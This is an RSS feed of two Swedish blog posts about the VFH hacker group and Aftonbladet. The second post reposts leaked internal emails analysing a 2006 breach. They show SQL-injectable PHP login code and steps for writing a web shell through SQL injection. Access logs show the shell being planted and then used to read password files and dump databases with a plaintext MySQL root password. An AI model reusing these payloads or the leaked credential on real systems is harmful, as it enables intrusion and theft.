<?xml version="1.0" encoding="iso-8859-1"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>En blå resa &#187; vuxna förbannade hackare</title>
	<atom:link href="http://www.lediga.st/tag/vuxna-forbannade-hackare/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.lediga.st</link>
	<description></description>
	<lastBuildDate>Tue, 01 Sep 2009 10:39:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>”Kom och hälsa på – jag ska med spänning lyssna på er och förklara hur jag ser på saken&quot;</title>
		<link>http://www.lediga.st/2008/01/%e2%80%9dkom-och-halsa-pa-%e2%80%93-jag-ska-med-spanning-lyssna-pa-er-och-forklara-hur-jag-ser-pa-saken/</link>
		<comments>http://www.lediga.st/2008/01/%e2%80%9dkom-och-halsa-pa-%e2%80%93-jag-ska-med-spanning-lyssna-pa-er-och-forklara-hur-jag-ser-pa-saken/#comments</comments>
		<pubDate>Sat, 05 Jan 2008 22:46:33 +0000</pubDate>
		<dc:creator>Jonas Byström</dc:creator>
				<category><![CDATA[Hackade sidor]]></category>
		<category><![CDATA[aftonbladet]]></category>
		<category><![CDATA[vuxna förbannade hackare]]></category>

		<guid isPermaLink="false">http://www.lediga.st/2008/01/05/%e2%80%9dkom-och-halsa-pa-%e2%80%93-jag-ska-med-spanning-lyssna-pa-er-och-forklara-hur-jag-ser-pa-saken/</guid>
		<description><![CDATA[Klart Vuxna Förbannade Hackare är intresserade av att avslöja sig. Or not =) Dom är så roligt på aftonbladet, där går det att läsa &#034;Tidningens chefredaktör Jan Helin: ”Kom och hälsa på – jag ska med spänning lyssna på er och förklara hur jag ser på saken” Det går också att läsa på Aftonbladet &#034;Gruppen [...]]]></description>
			<content:encoded><![CDATA[<!-- no icon for 'Hackade sidor' --><p><img src="http://www.lediga.st/wp-content/uploads/2008/01/aftonbladet-mail.jpg" alt="Aftonbladet mail" height="95" width="475" /></p>
<p>Klart Vuxna Förbannade Hackare är intresserade av att avslöja sig. Or not =)<br />
Dom är så roligt på aftonbladet, där går det att läsa &#034;<em>Tidningens chefredaktör Jan Helin: ”Kom och hälsa på – jag ska med spänning lyssna på er och förklara hur jag ser på saken</em>”</p>
<p>Det går också att läsa på Aftonbladet<br />
&#034;<em>Gruppen är extremt skickliga på datorer. Genom att ta sig in i Aftonbladets datasystem har de på punkt för punkt avslöjat svagheterna i våra system.</em><strong>&#034;</strong><br />
Men ska man se vad som är tidigare har hänt <a href="http://www.lediga.st/tag/Aftonbladet/"  target="_blank">tidigare</a> med aftonbladet så kan man ju misstänka att säkerheten inte har varit så himla bra på Aftonbladet.<br />
Så varför skulle AFH vilja komma till Aftonbladet och förklara för dom hur dom ska skydda sig för att inte sådana som AFH ska kunna angripa igen?</p>
<p>&#034;<em>Men VFH:s nya uppgifter visar ytterligare en sak: De kan nu ha tillgång till information som är källskyddad enligt svensk grundlag. På ren svenska: journalisters kontakter med källor. Det är vårt allra heligaste.</em>&#034;<br />
Ja det kanske man ska tänkt på första gången, eller trodde dom inte på dom då eller vadå?<br />
Jag tycker företag är så naiva när dom får information som berättar för dom vilka fel som finns, men dom vill inte lyssna för deras &#034;jätte duktiga IT-experter kan ju det här&#034;, eller så kanske det inte var så.</p>
<p>&#034;<em>Kom och hälsa på mig på redaktionen söndag klockan 15.00, eller på måndag samma tid. Vi kan göra något så omodernt men mysigt som att dricka eftermiddagskaffe. Jag ska med spänning lyssna på er och förklara hur jag ser på saken.</em>&#034;<br />
Ja det återstår ju att se om dom kommer, men ska jag chansa så tror jag inte att dom komemr sätta sin fot där, inte ens för att Aftonbladet lovar &#034;<em>Ni kan självklart förbli helt anonyma om ni så vill. Svensk grundlag förbjuder mig att röja era identiteter.</em>&#034; då dom har bevisat att det verkar ju inte fungera.</p>
<p>Du kan läsa mera på Aftonbladet <a href="http://www.aftonbladet.se/nyheter/article1573466.ab"  target="_blank">här</a> samt en tidigare artikel om <a href="http://www.aftonbladet.se/nyheter/article1573522.ab"  target="_blank"><em>Fortsatta problem efter dataintrånget</em></a></p>
<hr/>Copyright &copy; 2010 <strong><a href="http://www.lediga.st" >En blå resa</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact legal@lediga.st so we can take legal action immediately.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/" >Plugin</a> by <a href="http://www.taragana.com/" >Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://www.lediga.st/2008/01/%e2%80%9dkom-och-halsa-pa-%e2%80%93-jag-ska-med-spanning-lyssna-pa-er-och-forklara-hur-jag-ser-pa-saken/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Vuxna Förbannade Hackare i farten igen</title>
		<link>http://www.lediga.st/2008/01/vuxna-forbannade-hackare-i-farten-igen/</link>
		<comments>http://www.lediga.st/2008/01/vuxna-forbannade-hackare-i-farten-igen/#comments</comments>
		<pubDate>Sat, 05 Jan 2008 15:00:41 +0000</pubDate>
		<dc:creator>Jonas Byström</dc:creator>
				<category><![CDATA[Hackade sidor]]></category>
		<category><![CDATA[aftonbladet]]></category>
		<category><![CDATA[IDG]]></category>
		<category><![CDATA[vuxna förbannade hackare]]></category>

		<guid isPermaLink="false">http://www.lediga.st/2008/01/05/vuxna-forbannade-hackare-i-farten-igen/</guid>
		<description><![CDATA[Nu är dom framme igen och givit lite svar på tal på mail som har gått via aftonbladet angående hackningarna tidigare år. Det här är direkt taget ifrån Flashback forumet. &#034;Hej ärade Flashbackare och svenka folk! VFH här igen. Ville bara tacka för allt ni bidragit med och att vi inte sitter och är förbannade [...]]]></description>
			<content:encoded><![CDATA[<!-- no icon for 'Hackade sidor' --><p><img src="http://www.lediga.st/wp-content/uploads/2008/01/aftonbladet-mail.jpg" alt="Aftonbladet mail" height="95" width="475" /><br />
Nu är dom framme igen och givit lite svar på tal på mail som har gått via aftonbladet angående hackningarna tidigare år.</p>
<p>Det här är direkt taget ifrån Flashback <a href="http://www.flashback.info/showthread.php?t=598838"  target="_blank">forumet</a>.</p>
<p>&#034;<em>Hej ärade Flashbackare och svenka folk!<br />
VFH här igen. Ville bara tacka för allt ni bidragit med och att vi inte sitter<br />
och är förbannade för oss själva över vad media håller på med. Den ointressanta<br />
smörja Aftonbladet väljer att skriva om är verkligen inte journalistik och skall<br />
inte accepteras.</em></p>
<p><em>Folket måste göras påminda om att det media skiter ur sig och trycker på oss<br />
inte alltid är sanningen. Istället väljer man att köra på det som säljer och en<br />
massa jävla snyfthistorier och smutskastning av människor. Usch. Verkligen skönt<br />
att se det är fler som håller med oss och tycker att dräggen på aftonhoran skall<br />
få stå sitt kast och hängas ut.</em></p>
<p><em>Det är inte OK att helt utan grunder publikt håna folk bara för att man har<br />
möjlighet att göra det (eller vad tycker ni på Aftonbladets redaktion?).</em></p>
<p><em>Även om så pass många håller med om att Aftonbladet är skit tycks de bli större<br />
och prackar på oss fler och fler bilagor, gratistidnignar och tv-kanaler. Det är<br />
nog många som är villiga att skriva under på att det är allt annat än en god<br />
utveckling. Denna incident har förhoppningsvis bidragit till ett förlorat<br />
förtroende för Aftonbladet när det gäller tipsare, kunder och andra som haft att<br />
göra med tidningen. Något som glädjer oss innerligen.</em></p>
<p><em>Aftonbladet, inse att ni är tokägda och att folket är förfärligt trötta på era<br />
lögner. Intranätet kanske innehöll lite mer än vad ni sagt? <img src="http://www.flashback.info/images/smilies2/grin.gif" title="Grin" class="inlineimg" border="0" /></em></p>
<p><em>Om ni ska gå igenom logg efter logg så kan vi ge er ett tips på vart ni ska börja.<br />
Hur gick detta till? Ja, Aftonbladet. Hur tog vi oss in?<br />
Här är Aftonbladets version om hur vi tog oss in, men aldrig ut ur annonsystemet år 2006.</em></p>
<p><em>&#8212;</em></p>
<p><em>From: Xxx Xxx <a href="mailto:xxx.xxx@aftonbladet.se">xxx.xxx@aftonbladet.se</a><br />
Sender: &#034;lg teknik&#034; <a href="mailto:lg.teknik@aftonbladet.se">lg.teknik@aftonbladet.se</a><br />
Subject: Re: [lg.teknik] transfer3 uppdatering&#8230;<br />
Date: Wed, 21 Jun 2006 20:35:20 +0200<br />
To: * &#034;lg teknik&#034; <a href="mailto:lg.teknik@aftonbladet.se">lg.teknik@aftonbladet.se</a></em></p>
<p><em>21 jun 2006 kl. 18.55 skrev Xxx Xxx:</em></p>
<p><em>Hej!</em></p>
<p><em>Vi har nu rett ut hur intrånget gick till. Svagheterna i vår konfiguration var flera som ni kommer att se i beskrivningen:</em></p>
<p><em>Hackarna nyttjade inloggningsfunktionen på  annonsmottagningstjänsten. Så här ser php-koden ut:</em></p>
<p><em>Om man inte väljer att köra addslashes på $user och<br />
$password så måste man välja att slå på &#034;magic quotes&#034; i<br />
php-konfigurationen. Om &#034;magic quotes&#034; är på så körs addslashes<br />
funktionen på alla variabler som skickas in från formulär. Problemet<br />
var att magic quotes inte var påslaget. Vi kan lägga ett stort ansvar<br />
för den missen på Infomaker då vi tidigare fått rekommendationen att<br />
slå av &#034;magic quotes&#034; av Xxx Xxx på Infomaker när en funktion i<br />
tjänsten inte fungerade som den skulle. Jag har kvar det mailet som han<br />
skickade 17 maj i år. Förmildrande för Infomaker är att Xxx Xxx<br />
hos dem, som utvecklat tjänsten, har arbetat mycket med oss för att<br />
hitta intrångsvägen och även spårat upp en av de som sannolikt<br />
genomförde intrånget. Jag lämnar det till Oscar att besluta om vi ska<br />
polisanmäla hackarna, samt om vi ska föra en diskussion med Infomaker<br />
om kompensation.</em></p>
<p><em>En annan svaghet som möjliggjorde intrånget var att användaren som<br />
anslöt till mysql från annonstjänstens php-kod hade fulla rättigheter i<br />
mysql och kunde därför skapa mysql-tabellen och dumpa ut den i en fil.</em></p>
<p><em>&#8230;.</em></p>
<p><em>21 jun 2006 kl. 09.48 skrev Xxx Xxx:<br />
Hej allihopa,</em></p>
<p><em>jag har lekt lite detektiv med de loggar som jag har fått ta del av och tolkar dom så här:<br />
Initialt så var det ett par svenska killar som gav sig in på att testa lite out<br />
of the box hackerlösningar på aftonbladet och lyckades med en sql<br />
injection och skapade cmd2.php (på samma sätt och med samma filnamn som<br />
jag hittade i ett kinesiskt forum). Dessa svenska killar spred sedan<br />
uppgifterna på något slags forum eller via en irc-kanal vilket<br />
resulterade i att ganska snart började det dyka upp såväl amerikanska,<br />
kinesiska som tyska ip-nummer i loggen som alal anropar filen. Eftersom<br />
det är en out of the box lösning och dom har använt sig avsamma filnamn<br />
som i exemplet så får det mig att tro att dom är inga experter, deras<br />
kommandon som dom sedan har skickat in är också ganska sporadiska. Vi<br />
har lyckats identifiera två tidiga ip-nummer från logutdraget nedan:<br />
84.55.93.136 och 213.113.27.69. Båda förekommer tidigt i det utdraget<br />
och båda går till två svenska internetlevrantörer:</em></p>
<p><em>84.55.93.136 84-55-93-136.rev.sth.ownit.se<br />
213.113.27.69 c-451b71d5.026-20-6b6c6d11.cust.bredbandsbolaget.se</em></p>
<p><em>Det sistnämnda ipnummret visade sig innehålla en webbsida, &#034;orelevant&#034;. En<br />
googing på det visade att det dessutom fanns en registrerad domän på<br />
den orelevant. Nic-se gav mig ett namn på innehavaren av den adressen:<br />
&#034;Xxx Xxx&#034;. en googling på &#034;orelevant&#034; gav mig ett<br />
antal träffar i olika linux, kernel och hackerforum samt ett<br />
födelsedatum &#034;orelevant&#034; <a href="http://www.flashback.info/leave.php?http://kerneltrap.org/user/orelevant"  target="_blank">http://kerneltrap.org/user/orelevant</a> och en epsotadress <a href="mailto:aftonbladetsucks@aftonbladet.se">aftonbladetsucks@aftonbladet.se</a>.<br />
Birthday.se gav mig en ort(orelevant) på en Xxx Xxx född XXXX. Hitta.se gav mig en adress:<br />
Xxx Xxx Tfn/fax: XXXX-XXXXXXX (Delas med (det är aftonbladet vi vill åt) Adress Orelevant. XX X XXXXX XXXXX<br />
Eftersom Xxx verkar vara aktiv i olika linux, kernel, exploit forum så<br />
tycker jag att det tyder på att han förmodligen inte har blivit hackad<br />
själv utan tvärtom har ett litet intresse av den här typen av<br />
aktiviteter och han förmodligen fått ta del av den här lösningen i<br />
något forum (förmodligen en gansk aktiv kanal) och att han har testat<br />
lite. Mitt förslag är att någon på aftonbladet juridiskt kunnig person<br />
kontaktar Xxx, får hans knäna atts kaka och<br />
tänder att skallra samt ber honom om information om var har har fått<br />
tillgång till den här informationen och på vilket sätt han har nyttjat<br />
den samt om han känner till om och hur och när andra har utnyttjat den.<br />
På så sätt bör vi (om vi vill) kunna rotadjupare i det här ärendert och<br />
kanske kunna komma åt själva källan. Men innan<br />
vi gör något sådant ger jag er rådet att slå på magic_quotes i er<br />
php.ini så att inga upprörda hackare får för sig att göra någonting värre.</em></p>
<p><em>&#8212;</em></p>
<p><em>[* Allt jävla kinaprat och skit om att vi lagt upp information på nått tattarforum säger<br />
ju en del om hur lite insikt de har. Döm själva. *]</em></p>
<p><em>20 jun 2006 kl. 16.00 skrev Xxx Xxx:</em></p>
<p><em>Efter att vi plockade bort h4x.php filen så lyckades hackaren skapa den på nytt. Access-loggen visade ingenting:</em></p>
<p><em>209.242.5.54 &#8211; - [18/Jun/2006:21:07:45 +0200] &#034;GET /h4x.php HTTP/1.1&#034; 404 291<br />
209.242.5.54 &#8211; - [18/Jun/2006:21:08:17 +0200] &#034;POST /index.php HTTP/1.1&#034; 200 212<br />
209.242.5.54 &#8211; - [18/Jun/2006:21:10:25 +0200] &#034;POST /index.php HTTP/1.1&#034; 200 78<br />
209.242.5.54 &#8211; - [18/Jun/2006:21:10:57 +0200] &#034;GET /h4x.php?cmd=id HTTP/1.1&#034; 200 101</em></p>
<p><em>21:07:45 fanns filen inte. 21:10:57 så var den på plats. Error loggen däremot:<br />
[Sun Jun 18 21:07:45 2006] [error] [client 209.242.5.54] File does not exist: /Library/WebServer/Documents/annons/h4x.php<br />
[Sun Jun 18 21:08:17 2006] [error] PHP Notice: Undefined variable: version in /Library/WebServer/Documents/annons/includes/prefs.php on line 2<br />
[Sun Jun 18 21:08:17 2006] [error] PHP Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/annons/includes/functions.php on line 759<br />
[Sun Jun 18 21:10:25 2006] [error] PHP Notice: Undefined variable: version in /Library/WebServer/Documents/annons/includes/prefs.php on line 2</em></p>
<p><em>21:07:45 fanns inte filen där. 21:08:17 så körs följande PHP kod som avslutas med en PHP-varning:<br />
function doLogin($user,$password){ $query = &#034;SELECT * FROM user ;WHERE userName=&#039;$user&#039; AND password=&#039;$password&#039;&#034;; $result = mysql_query($query) OR DIE(mysql_error()); $rows = mysql_NumRows($result); if($rows!=0){</em></p>
<p><em>Jag gissar att hackaren utnyttjar någon form av SQL injection svaghet i<br />
variablerna user och/eller password som får antingen PHP eller MySQL<br />
att urarta på ett sånt sätt att filen h4x.php skrivs till disk. Det<br />
känns mer troligt att det är PHP, då filen skapas i PHPs rootmapp.</em></p>
<p><em>Den här texten känns mycket relevant:</em></p>
<p><em><a href="http://www.flashback.info/leave.php?http://www.sitepoint.com/article/php-security-blunders/2"  target="_blank">http://www.sitepoint.com/article/php-security-blunders/2</a></em></p>
<p><em>Intressant är att den rekommenderade lösningen, att slå på magic quotes<br />
rekommenderade Xxx oss att slå av när Xxx ville byta en språkvariabel.</em></p>
<p><em>/Ian</em></p>
<p><em> Från: Xxx Xxx <a href="mailto:xxx@infomaker.se">xxx@infomaker.se</a><br />
Datum: tisdag 20 jun 2006 11.31.01 GMT+02:00<br />
Till: Xxx Xxx <a href="mailto:xxx.xxx@aftonbladet.se">xxx.xxx@aftonbladet.se</a><br />
Kopia: Xxx Xxx <a href="mailto:xxx.xxx@aftonbladet.se">xxx.xxx@aftonbladet.se</a>, Xxx Xxx infomaker.se, Xxx Xxx <a href="mailto:xxx@infomaker.se">xxx@infomaker.se</a><br />
Ämne: Re: h4x</em></p>
<p><em>Hej,</em></p>
<p><em>nu har jag tittat lite på loggarna och googlat lite. Det visade sig att<br />
nyckeln ligger i cmd2.php som är inkörsporten. cmd2.php verkar kunna<br />
komma in på en del olika sätt ett är att en bugg i xml-rpc gör att om<br />
man kör en eval() på vissa typer av xml kan gör att man kan skapa<br />
php-filer på servern. Ett exempel är t.ex om man kör CMS-systemet<br />
Drupal (<a href="http://www.flashback.info/leave.php?http://secunia.com/advisories/15852/%29"  target="_blank">http://secunia.com/advisories/15852/)</a>. Vad kör ni mer på servern än annonsmottagningen?<br />
Ett annat sätt att skapa filen verkar vara genom att med hjälp av en sql-injection:</em></p>
<p><em>1. skapa en ny tabell i mysql<br />
2. peta in php-kod i den nya mysql-tabellen<br />
3. göra en mysql-selection till en extern fil (ny har vi en php-fil som går att köra)<br />
4. gör en ;drop på tabellen så att spåren försvinner i mysql.</em></p>
<p><em>Jag hittade en liten instruktion på hur man gör det på en chinesisk site: <a href="http://www.flashback.info/leave.php?http://www.cnxhacker.com/Article/show/378.html"  target="_blank">http://www.cnxhacker.com/Article/show/378.html</a></em></p>
<p><em>Det här kan man lösa genom att dels verifiera att ingen php åker in i mysql<br />
och att den användare sqom websysteme använder inte får dumpa data till<br />
fil och inte får skapa nya tabeller. Att enbart se över mysqlanvändsarens rättigheter är en snabb fix.</em></p>
<p><em>/Xxx</em></p>
<p><em>20 jun 2006 kl. 10.57 skrev Xxx Xxx:</em></p>
<p><em>transfer3:/Library/WebServer/Documents/annons root# cat /var/log/httpd/access_log | grep h4x<br />
&#8230;<br />
66.63.162.152 &#8211; - [18/Jun/2006:02:40:09 +0200] &#034;GET /annons/cmd2.php?cmd=echo%20%22%3Cpre%3E%3C?%20system($_GE T['cmd']);%20?%3E%3C/pre%3E%22%3Eh4x.php HTTP/1.1&#034; 200 52<br />
66.63.162.152 &#8211; - [18/Jun/2006:02:40:23 +0200] &#034;GET /annons/h4x.php?cmd=id HTTP/1.1&#034; 200 5<br />
66.63.162.152 &#8211; - [18/Jun/2006:02:41:14 +0200] &#034;GET /annons/cmd2.php?cmd=rm%20h4x.php HTTP/1.1&#034; 200 52<br />
66.63.162.152 &#8211; - [18/Jun/2006:02:46:48 +0200] &#034;GET /annons/cmd2.php?cmd=echo%20%22%3Cpre%3E%3C%3F%20system(\\ $_GET['cmd']);%3F%3E%3C/pre%3E%22%3Eh4x.php HTTP/1.1&#034; 200 52<br />
66.63.162.152 &#8211; - [18/Jun/2006:02:47:52 +0200] &#034;GET /annons/h4x.php?cmd=rm%20cmd.php HTTP/1.1&#034; 200 24<br />
66.63.162.152 &#8211; - [18/Jun/2006:02:47:59 +0200] &#034;GET /annons/h4x.php?cmd=rm%20cmd2.php HTTP/1.1&#034; 200 24<br />
85.10.240.250 &#8211; - [18/Jun/2006:03:08:50 +0200] &#034;GET /annons/h4x.php?cmd=cat%20/private/etc/afpovertcp.cfg HTTP/1.1&#034; 200 539<br />
85.10.240.250 &#8211; - [18/Jun/2006:03:09:10 +0200] &#034;GET /annons/h4x.php?cmd=cat%20/etc/authorization HTTP/1.1&#034; 200 17509<br />
85.10.240.250 &#8211; - [18/Jun/2006:03:11:12 +0200] &#034;GET /annons/h4x.php?cmd=cat%20/private/etc/ftpusers HTTP/1.1&#034; 200 143<br />
72.21.33.202 &#8211; - [18/Jun/2006:03:22:10 +0200] &#034;GET /annons/h4x.php?cmd=ls%20/Network/Servers HTTP/1.1&#034; 200 49<br />
72.21.33.202 &#8211; - [18/Jun/2006:03:22:34 +0200] &#034;GET /annons/h4x.php?cmd=ls%20/Network/Servers/transfer3.aftonbladet.se/ HTTP/1.1&#034; 200 175<br />
88.191.22.62 &#8211; - [18/Jun/2006:03:30:30 +0200] &#034;GET /annons/h4x.php?cmd=ls%20/Users/admin/Sites HTTP/1.1&#034; 200 42<br />
149.9.0.25 &#8211; - [18/Jun/2006:03:41:12 +0200] &#034;GET /annons/h4x.php?cmd=ls%20-al%20../inpoc/admin HTTP/1.1&#034; 200 255<br />
149.9.0.25 &#8211; - [18/Jun/2006:03:41:50 +0200] &#034;GET /annons/h4x.php?cmd=cat%20../inpoc/admin/properties.txt HTTP/1.1&#034; 200 25<br />
199.77.130.14 &#8211; - [18/Jun/2006:03:45:00 +0200] &#034;GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/admin/index.php HTTP/1.1&#034; 200 1887<br />
199.77.130.14 &#8211; - [18/Jun/2006:03:46:09 +0200] &#034;GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/.htpasswd HTTP/1.1&#034; 200 44<br />
88.191.12.200 &#8211; - [18/Jun/2006:03:47:51 +0200] &#034;GET /annons/h4x.php?cmd=strings%20/private/etc/pure-ftpd/pureftpd.passwd HTTP/1.1&#034; 200 7639<br />
193.219.28.245 &#8211; - [18/Jun/2006:03:52:18 +0200] &#034;GET /annons/h4x.php?cmd=ls%20-la%20/Library/FTPServer/VirtualUsers/aftonbladet/ HTTP/1.1&#034; 200 207<br />
193.219.28.245 &#8211; - [18/Jun/2006:03:53:01 +0200] &#034;GET /annons/h4x.php?cmd=ls%20-la%20/Library/FTPServer/VirtualUsers/sport HTTP/1.1&#034; 200 279<br />
&#8230;.<br />
transfer3:/Library/WebServer/Documents/annons root#<br />
- &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</em></p>
<p><em>Xxx Xxx</em></p>
<p><em>Infomaker Scandinavia AB</em></p>
<p><em>Box 347, SE-391 23 Kalmar, Sweden</em></p>
<p><em>Tel +46 480 36 20 05, Fax +46 480 887 25</em></p>
<p><em><a href="mailto:xxx@infomaker.se">xxx@infomaker.se</a>, &lt;a href=&#034;http://mail.aftonbladet.se/Redirect/www.infomaker.se&#034; target=&#034;_blank&#034;&gt;www.infomaker.se&lt;/a&gt;</em></p>
<p><em>&#8212;</em></p>
<p><em>[* Vart fan får han xml-rpc idéerna ifrån? Senaste dödsbuggen på bugtraq eller vad? *]</em></p>
<p><em>Från: Xxx Xxx <a href="mailto:xxx@infomaker.se">xxx@infomaker.se</a><br />
Datum: tisdag 20 jun 2006 19.46.27 GMT+02:00<br />
Till: Xxx Xxx <a href="mailto:xxx.xxx@aftonbladet.se">xxx.xxx@aftonbladet.se</a><br />
Kopia: För många.</em></p>
<p><em>Japp,<br />
om man har slagit av magic_quotes så har man ett säkerhetshål som<br />
tillåter sql-injections. Slå omedelbart på den igen. Verifiera också<br />
att den mysql-användare som körs via scriptet includes/dbConnect.php<br />
inte får skapa tabeller, inte får skriva till fil.</em></p>
<p><em>Mvh Xxx</em></p>
<p><em>&#8212;</em></p>
<p><em>From: Xxx Xxx <a href="mailto:xxx.xxx@aftonbladet.se">xxx.xxx@aftonbladet.se</a><br />
Sender: &#034;* lg teknik&#034; <a href="mailto:lg.teknik@aftonbladet.se">lg.teknik@aftonbladet.se</a><br />
Subject: Re: [lg.teknik] SV: [lg.teknik] Fwd: [nattrapport] Dagrapport Tisdag den 20 Juni<br />
Date: Thu, 22 Jun 2006 02:11:47 +0200<br />
To: &#034;* lg teknik&#034; <a href="mailto:lg.teknik@aftonbladet.se">lg.teknik@aftonbladet.se</a></em></p>
<p><em>Följande tjänster är tillgängliga på yttre:</em></p>
<p><em>aftonbladet.se &#8211; länk till sajten.<br />
anslagstavlan &#8211; internt köp och sälj.<br />
bandbredd &#8211; direkt länk till IP-only, bör den ens finnas där?<br />
blanketter &#8211; ladda hem blanketter.<br />
boka &#8211; boka rum osv.<br />
chatparade &#8211; antalet samtida chattare, fel lösen?<br />
enkäten &#8211; internt enkät verkyg, vet ej om det används?<br />
exchangemail &#8211; nerlagd tjänst.<br />
hitparade &#8211; antalet besökare till aftonbladet, nerlagd 2005?<br />
julklapp &#8211; tjänst där man väljer storlek på väst som man fick i år.<br />
kalender_admin &#8211; adventkalender på galento-admin<br />
kartor &#8211; länk till hitta.se<br />
klicktoppen &#8211; fungerade länk till mest besökta länkarna på<br />
aftonbladet.se, bör knappast finnas på yttre, då man lätt bokmärker<br />
detta på hemdatorn, extremt känslig information!<br />
landguiden &#8211; länk till landguiden.se<br />
linkorama &#8211; död bokmärkeskatalog på galento<br />
lämna bild &#8211; länk till tjänst på transfer3<br />
lämna ljud &#8211; länk till <a href="http://www.flashback.info/leave.php?http://kodar.aftonbladet.se/"  target="_blank">http://kodar.aftonbladet.se/</a> som inte svarar,  död?<br />
lämna text &#8211; länk till tjänst på transfer3<br />
mera rätt &#8211; länk till tjänsten mera rätt.<br />
modempooler &#8211; länk till statisk sida om våra modempooler<br />
motionera mera &#8211; länk till nerlagd projekttjänst<br />
pepc &#8211; någon form av lämningstjänst för världsupplagan<br />
pit &#8211; Samlingssida för <a href="http://www.flashback.info/leave.php?www.aftonbladet.se"  target="_blank">www.aftonbladet.se</a> övervakningssidor, funkar ej?<br />
publicera på galento &#8211; kan man göra det från yttre?<br />
resa &#8211; länk till <a href="http://www.flashback.info/leave.php?www.ark.se"  target="_blank">www.ark.se</a><br />
Rixlex &#8211; länk till <a href="http://www.flashback.info/leave.php?http://www.riksdagen.se/debatt/"  target="_blank">http://www.riksdagen.se/debatt/</a><br />
räckvidd &#8211; tjänst för att se ab och konkurrenters räckvidd, död?<br />
shibsted aktiekurs &#8211; skönt felstavad tjänst som tur är nerlagd, med  två användare?<br />
stega på &#8211; nerlagd projekttjänst<br />
Sverigekartan &#8211; länk till <a href="http://www.flashback.info/leave.php?http://www.sna.se/webbatlas/700/"  target="_blank">http://www.sna.se/webbatlas/700/</a>, tjänsten  suger jämfört med hitta.se<br />
telegram &#8211; vår interna telegramtjänst<br />
Tholin &#8211; länk med inloggning till tholin, enda användarna är ulla  lundberg och fisken, död?<br />
Upplysningscentralen &#8211; länk till <a href="http://www.flashback.info/leave.php?http://www.uc.se/?"  target="_blank">http://www.uc.se/?</a><br />
webbmail (säker) &#8211; länk till <a href="http://www.flashback.info/leave.php?https://mail.aftonbladet.se"  target="_blank">https://mail.aftonbladet.se</a><br />
www statistik &#8211; samlingssida för aftonbladet.se statistik innehåller<br />
länkar inklusive inloggning till extern extremt känslig information,<br />
återigen kan bokmärkas på hemdatorer!</em></p>
<p><em>Några tjänster bör nog ryckas omedelbart pga de känsliga länkarna som<br />
kan bokmärkas på datorer som vi inte äger. Andra kan nog strykas då de<br />
är nerlagda.</em></p>
<p><em>Sista månaden har följande klickats på yttregalento:<br />
webbmail (säker) &#8211; 1994 (bara en länk till mail.aftonbladet.se&#8230;)<br />
meraratt &#8211; 450&lt;br&gt;<br />
lämna text &#8211; 393 (fast man kan göra samma sak direkt i scoop)<br />
aftonbladet.se &#8211; 317<br />
telegram &#8211; 211<br />
motionera mera &#8211; 140 (trots att tjänsten är nerlagd?)<br />
anslagstavlan &#8211; 69<br />
lämna bild &#8211; 32<br />
resa &#8211; 28<br />
www statistik &#8211; 20<br />
blanketter &#8211; 19<br />
modempooler &#8211; 6</em></p>
<p><em>/Ian<br />
</em></p>
<p><em> 21 jun 2006 kl. 12.37 skrev Xxx Xxx:</em></p>
<p><em>En till oroväckande tanke. eftersom mysqldumpen är på vift så innebär det<br />
också att alla era kunder inlogg med tillhörande lösenord är på vift.<br />
Det enda rimliga är att man automatgenererar nya lösenord och mailar ut<br />
dessa till era kunder med automatik.</em></p>
<p><em>Mvh Xxx</em></p>
<p><em>&#8212;</em></p>
<p><em>21 jun 2006 kl. 12.15 skrev Xxx Xxx:</em></p>
<p><em>Jag får en känsla av att filen hx4.php finns på flera ställen anrop sker ju<br />
till både /annons/h4x.php och /h4x.php har ni sökt och rensat<br />
ordentligt? det vorde också spännande att få ta sig en titt på exakt<br />
vad dom innehåller. (både h4x.php och cmd2.php)</em></p>
<p><em>/Xxx</em></p>
<p><em>&#8211;</em></p>
<p><em>21 jun 2006 kl. 11.56 skrev Xxx Xxx:</em></p>
<p><em>Nu har jag läst loggarna och det är ingen rolig läsning. Det har rört sig<br />
om ganska mycket aktivitet och den del är direkt farlig och öppnar nya<br />
hål:</em></p>
<p><em>här sker angreppet:<br />
217.160.135.169 &#8211; - [18/Jun/2006:02:05:25 +0200] &#034;POST /index.php HTTP/1.1&#034; 200 212</em></p>
<p><em>här skapas filen på nytt:<br />
209.242.5.54 &#8211; - [18/Jun/2006:21:10:25 +0200] &#034;POST /index.php HTTP/1.1&#034; 200 78</em></p>
<p><em>rootlösen för mysql på avvägar:<br />
84.19.182.23 &#8211; - [18/Jun/2006:21:25:18 +0200] &#034;GET /h4x.php?cmd=mysqlshow%20&#8211;user%20root%20&#8211;password=8ull3r6yn HTTP/1.1&#034; 200 62</em></p>
<p><em>alla databaser dumpade till fil:<br />
195.169.149.213 &#8211; - [18/Jun/2006:21:28:02 +0200] &#034;GET /h4x.php?cmd=mysqldump%20&#8211;all-databases%20&#8211;user%20root%20-p%208ull3r6yn%20%3E%20/tmp/.e HTTP/1.1&#034; 200 62<br />
misslyckades med dump raderar och läser mysql&#8211;help<br />
195.169.149.213 &#8211; - [18/Jun/2006:21:28:25 +0200] &#034;GET /h4x.php?cmd=cat%20/tmp/.e HTTP/1.1&#034; 200 62<br />
